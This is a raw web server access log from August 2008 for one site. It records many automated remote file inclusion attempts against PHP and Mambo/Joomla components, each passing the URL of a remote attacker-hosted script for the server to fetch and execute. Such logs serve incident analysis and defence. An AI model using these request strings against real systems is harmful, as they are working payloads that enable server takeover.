121.124.127.40 - - [31/Aug/2008:11:33:33 -0700] "GET /index.php?body=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 200 89500 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [31/Aug/2008:11:33:33 -0700] "GET /logs/index.php?body=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [31/Aug/2008:11:33:35 -0700] "GET /logs/access_080630.log/index.php?body=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:11:33:36 -0700] "GET /logs/access_080602.log//admin.a6mambocredits.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
201.238.195.13 - - [31/Aug/2008:11:33:37 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.238.195.13 - - [31/Aug/2008:11:33:37 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:11:33:37 -0700] "GET /logs/access_080602.log//admin.a6mambocredits.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:11:33:39 -0700] "GET /logs/access_080602.log//admin.a6mambocredits.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
121.124.127.40 - - [31/Aug/2008:11:33:40 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:33:45 -0700] "GET /logs/access_071231.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:11:33:52 -0700] "GET /logs/access_080602.log//admin.a6mambocredits.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:11:34:10 -0700] "GET /logs/access_080103.log//admin.a6mambocredits.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:11:34:13 -0700] "GET /logs/access_080103.log//admin.a6mambocredits.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:11:34:13 -0700] "GET /logs/access_080103.log//admin.a6mambocredits.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:11:34:17 -0700] "GET /logs/access_080103.log//admin.a6mambocredits.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:11:34:43 -0700] "GET /logs/access_080313.log//?custompluginfile[]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:34:44 -0700] "GET /logs/access_080209.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:34:44 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:34:45 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:11:34:47 -0700] "GET /logs/access_080131.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://amc.phpnet.us/AMCrew.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:11:34:47 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://amc.phpnet.us/AMCrew.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:11:34:47 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://amc.phpnet.us/AMCrew.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:11:34:47 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://amc.phpnet.us/AMCrew.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.105.117 - - [31/Aug/2008:11:34:50 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 50 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [31/Aug/2008:11:34:51 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:34:54 -0700] "GET /logs/access_080811.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:34:55 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:34:55 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.199.190.37 - - [31/Aug/2008:11:35:02 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:11:35:03 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:11:35:03 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.25.180.198 - - [31/Aug/2008:11:35:13 -0700] "GET /convert/mvcw.php?vwar_root=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:35:21 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:35:21 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.47.10.168 - - [31/Aug/2008:11:35:23 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.10.168 - - [31/Aug/2008:11:35:24 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.169.169.235 - - [31/Aug/2008:11:35:27 -0700] "GET /logs/access_080701.log//bemarket/postscript/postscript.php?p_mode=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:35:48 -0700] "GET /logs/access_071228.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.238.195.13 - - [31/Aug/2008:11:35:49 -0700] "GET /logs/access_080209.log//popup_window.php?site_isp_root=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [31/Aug/2008:11:35:58 -0700] "GET /logs/access_080115.log/errors.php?error=http://ontheribbon.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [31/Aug/2008:11:35:58 -0700] "GET /logs/access_080121.log/errors.php?error=http://ontheribbon.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [31/Aug/2008:11:35:58 -0700] "GET /errors.php?error=http://ontheribbon.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [31/Aug/2008:11:35:58 -0700] "GET /logs/errors.php?error=http://ontheribbon.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.105.117 - - [31/Aug/2008:11:36:04 -0700] "GET /?DOCUMENT_ROOT=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 89477 "-" "libwww-perl/5.65" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:36:06 -0700] "GET /logs/access_080329.log/modules/4nAlbum/public/displayCategory.php?basepath=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.105.117 - - [31/Aug/2008:11:36:07 -0700] "GET /logs/?DOCUMENT_ROOT=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 63000 "-" "libwww-perl/5.65" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:36:07 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:36:08 -0700] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.169.235 - - [31/Aug/2008:11:36:12 -0700] "GET /logs/access_080821.log//bemarket/postscript/postscript.php?p_mode=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.169.235 - - [31/Aug/2008:11:36:12 -0700] "GET /logs/access_080804.log//bemarket/postscript/postscript.php?p_mode=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:36:42 -0700] "GET /logs/access_080213.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:11:36:45 -0700] "GET /logs/access_080802.log//index.php?abg_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:11:36:46 -0700] "GET /logs/access_080711.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://amc.phpnet.us/AMCrew.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:11:36:47 -0700] "GET //index.php?abg_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 89432 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [31/Aug/2008:11:36:48 -0700] "GET /logs/access_080730.log///vwar/backup/errors.php?error=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [31/Aug/2008:11:36:48 -0700] "GET ///vwar/backup/errors.php?error=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [31/Aug/2008:11:36:48 -0700] "GET /logs///vwar/backup/errors.php?error=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:11:36:48 -0700] "GET /logs//index.php?abg_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:11:36:53 -0700] "GET /logs/access_080804.log//index.php?abg_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:37:23 -0700] "GET /logs/access_080209.log/modules/4nAlbum/public/displayCategory.php?basepath=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.158.41 - - [31/Aug/2008:11:37:31 -0700] "GET /logs/access_080803.log///vwar/backup/errors.php?error=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:11:37:32 -0700] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:11:37:32 -0700] "GET //admin.a6mambocredits.php?mosConfig_live_site=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:11:37:51 -0700] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:11:37:51 -0700] "GET //admin.a6mambocredits.php?mosConfig_live_site=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:11:37:54 -0700] "GET /logs/access_080604.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:11:37:55 -0700] "GET /logs/access_080709.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:11:37:56 -0700] "GET /logs/access_080604.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:11:37:56 -0700] "GET /logs/access_080709.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.226.77.5 - - [31/Aug/2008:11:38:00 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [31/Aug/2008:11:38:01 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [31/Aug/2008:11:38:02 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:11:38:06 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:11:38:06 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:11:38:08 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:11:38:08 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.124.127.40 - - [31/Aug/2008:11:38:12 -0700] "GET /index.php?pag=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 200 89527 "-" "libwww-perl/5.79" "www.dmulk.com"
75.127.70.16 - - [31/Aug/2008:11:38:23 -0700] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.127.70.16 - - [31/Aug/2008:11:38:23 -0700] "GET //admin.a6mambocredits.php?mosConfig_live_site=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:11:38:33 -0700] "GET /logs/access_080802.log//index.php?abg_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:11:38:34 -0700] "GET //index.php?abg_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 89400 "-" "libwww-perl/5.79" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:11:38:35 -0700] "GET /logs//index.php?abg_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.105.117 - - [31/Aug/2008:11:38:38 -0700] "GET /admin.remository.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [31/Aug/2008:11:38:39 -0700] "GET /logs/admin.remository.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.124.127.40 - - [31/Aug/2008:11:38:44 -0700] "GET /index.php?body=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 200 89532 "-" "libwww-perl/5.79" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:11:38:46 -0700] "GET /logs/access_080803.log//index.php?abg_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.68.149 - - [31/Aug/2008:11:38:50 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:11:38:51 -0700] "GET /logs//index.php?abg_path=http://albcrew.t35.com/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:11:38:52 -0700] "GET //index.php?abg_path=http://albcrew.t35.com/nid.txt? HTTP/1.1" 200 89437 "-" "libwww-perl/5.79" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:11:38:56 -0700] "GET /logs//index.php?abg_path=http://albcrew.t35.com/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:11:38:57 -0700] "GET /logs//index.php?abg_path=http://albcrew.t35.com/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:11:38:57 -0700] "GET //index.php?abg_path=http://albcrew.t35.com/nid.txt? HTTP/1.1" 200 89437 "-" "libwww-perl/5.79" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:11:38:57 -0700] "GET //index.php?abg_path=http://albcrew.t35.com/nid.txt? HTTP/1.1" 200 89437 "-" "libwww-perl/5.79" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:11:38:59 -0700] "GET /logs//index.php?abg_path=http://albcrew.t35.com/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:11:39:00 -0700] "GET /logs//index.php?abg_path=http://albcrew.t35.com/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:11:39:00 -0700] "GET /logs//index.php?abg_path=http://albcrew.t35.com/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:11:39:01 -0700] "GET //index.php?abg_path=http://albcrew.t35.com/nid.txt? HTTP/1.1" 200 89437 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:11:39:01 -0700] "GET //index.php?abg_path=http://albcrew.t35.com/nid.txt? HTTP/1.1" 200 89437 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:11:39:02 -0700] "GET //index.php?abg_path=http://albcrew.t35.com/nid.txt? HTTP/1.1" 200 89437 "-" "libwww-perl/5.79" "www.dmulk.com"
81.177.22.242 - - [31/Aug/2008:11:39:10 -0700] "GET /logs/access_080806.log/?INCLUDE_FOLDER=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.22.242 - - [31/Aug/2008:11:39:12 -0700] "GET /?INCLUDE_FOLDER=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 89482 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.22.242 - - [31/Aug/2008:11:39:13 -0700] "GET /logs/?INCLUDE_FOLDER=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 63000 "-" "libwww-perl/5.811" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:11:39:58 -0700] "GET /logs/access_080808.log//popup_window.php?site_isp_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:11:40:00 -0700] "GET //popup_window.php?site_isp_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:11:40:02 -0700] "GET /logs//popup_window.php?site_isp_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.106.68.149 - - [31/Aug/2008:11:40:21 -0700] "GET /logs/access_080131.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.68.149 - - [31/Aug/2008:11:40:21 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.68.149 - - [31/Aug/2008:11:40:22 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:11:40:23 -0700] "GET /logs/access_080218.log//admin.a6mambocredits.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:11:40:32 -0700] "GET /logs/access_080218.log//admin.a6mambocredits.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:11:40:35 -0700] "GET /logs/access_080218.log//admin.a6mambocredits.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
74.6.18.227 - - [31/Aug/2008:11:40:38 -0700] "GET /logs/access_070915.log HTTP/1.0" 200 65779 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.181.105.117 - - [31/Aug/2008:11:40:41 -0700] "GET /?INCLUDE_FOLDER=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 89450 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [31/Aug/2008:11:40:43 -0700] "GET /logs/?INCLUDE_FOLDER=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 63000 "-" "libwww-perl/5.65" "www.dmulk.com"
87.101.4.49 - - [31/Aug/2008:11:40:59 -0700] "GET /logs/access_071222.log%20/errors.php?error=http://ontheribbon.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:41:12 -0700] "GET /logs/access_080111.log//modules/vwar/admin/admin.php?vwar_root=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:41:13 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:41:13 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.70.15 - - [31/Aug/2008:11:41:20 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://kosherkash.net/public/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
